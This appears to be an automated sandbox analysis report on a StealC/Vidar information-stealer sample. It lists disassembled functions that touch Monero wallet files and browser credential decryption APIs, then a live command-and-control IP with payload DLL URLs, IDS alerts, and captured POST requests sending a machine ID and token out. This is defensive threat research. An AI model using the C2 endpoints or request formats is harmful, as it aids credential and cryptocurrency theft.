Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
Instruction ID: 972bab36d4471da358f9446d6586d20191f1c5ccb108edf6028921756d7a0ffb
Opcode Fuzzy Hash: ee7c65fa7b6814321a4b70376c0e72bf71e54042fc39cefb1dd41e1a19755855
Instruction Fuzzy Hash: 72213DB1A40208AFDB18DF95DD49FAEBBB8FB48701F144169F605B7280C779A905CBA1

Function 00BF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00BF951E,00000000), ref: 00BF8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00BF8D62
wsprintfW.USER32 ref: 00BF8D78

Strings

%hs, xrefs: 00BF8D6F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
Instruction ID: cd9922243008cd5eb60b9a5ed7eed345b0b69d43bb6ef8500225046d7a66b523
Opcode Fuzzy Hash: 0cdb9a9dd3b075daaa6c7e08a7427c077fcc82ecd0af214ee699fd4c668b0264
Instruction Fuzzy Hash: E3E08CB0A40208BFD728DB95DC0EE6977B8EB04702F0441A4FE09A7280DA719E058B96

Function 00BED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,0173A670,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BED481
lstrlen.KERNEL32(00000000), ref: 00BED698
lstrlen.KERNEL32(00000000), ref: 00BED6AC
DeleteFileA.KERNEL32(00000000), ref: 00BED72B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 516bb09b6f1fcbffd3bbdb5adf3c5e047916359a1d36479d9e8cede02b3a8d57
Instruction ID: 311906b4cfc406d6704b09ff002f583838551df32305ee2c3439a6b658dd2b98
Opcode Fuzzy Hash: 516bb09b6f1fcbffd3bbdb5adf3c5e047916359a1d36479d9e8cede02b3a8d57
Instruction Fuzzy Hash: 9391DEB191010C9BDB18EBA4DC96DFE73B8AF14340F5481A9F61A77091EF746A0DCB62

Function 00BF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: b1e06a906ba85fd5c06dda3c92c3d6bb97bfa9f25221cbfc7e14c6243b075a02
Instruction ID: d4d94cf808e43534199fce5172864e2ec856aa5ccd718971a752bde087a50c7e
Opcode Fuzzy Hash: b1e06a906ba85fd5c06dda3c92c3d6bb97bfa9f25221cbfc7e14c6243b075a02
Instruction Fuzzy Hash: DE4130B1D1410DAFCB08EFA4D895AFEB7F8EB44704F148058E615B7290DB746A0DCBA1

Function 00BF92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00BF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00BF3AEE,?), ref: 00BF92FC
GetFileSizeEx.KERNEL32(000000FF,00BF3AEE), ref: 00BF9319
CloseHandle.KERNEL32(000000FF), ref: 00BF9327

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
Instruction ID: 0eff473c34b7d8f7334fa30c7ff7e4c0c9e828dc28d13dcfb79b1a762e9303a4
Opcode Fuzzy Hash: b5700113505235d34fb31ccf1f131258a684f9bd90fe688188d47b67417393a8
Instruction Fuzzy Hash: 72F04F35E40208BFDB20DFB5DC49FAE77F9EB48710F10C2A4BA51A72C0D6B096058B44

Function 00BFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00BFC74E

Part of subcall function 00BFBF9F: __amsg_exit.LIBCMT ref: 00BFBFAF

__getptd.LIBCMT ref: 00BFC765
__amsg_exit.LIBCMT ref: 00BFC773
__updatetlocinfoEx_nolock.LIBCMT ref: 00BFC797

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
Instruction ID: 8ef5549a9d804962c196f3fdba962e98aa1c1c87a03670b453ddaf8f4a8b7389
Opcode Fuzzy Hash: 90b41280dae49e0e02b082cd3b1201284025ae6461d96d629c4af9f46b39af84
Instruction Fuzzy Hash: F3F06D3290420C9BD725BBB89906B7D7BE0AF00720F2541C9F604AB1D2DB645D88DF5A

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpser	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware

Source: 0.2.file.exe.be0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.be0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00BE9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BEC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_00BEC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00BE9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00BE7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00BF8EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 42 34 34 31 37 42 41 42 46 38 32 38 37 36 35 33 34 35 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"F1B4417BABF82876534592------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"doma------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 30 61 66 36 64 66 64 31 35 36 34 62 37 39 32 66 34 33 61 36 37 36 36 65 61 36 66 62 65 39 39 62 30 61 65 30 38 38 35 31 39 62 65 37 65 35 66 62 32 66 31 65 33 36 62 63 34 63 62 34 35 32 61 38 39 33 38 38 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"8f0af6dfd1564b792f43a6766ea6fbe99b0ae088519be7e5fb2f1e36bc4cb452a8938837------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="message"browsers------CAKKEGDGCGDAKEBFIJEC--
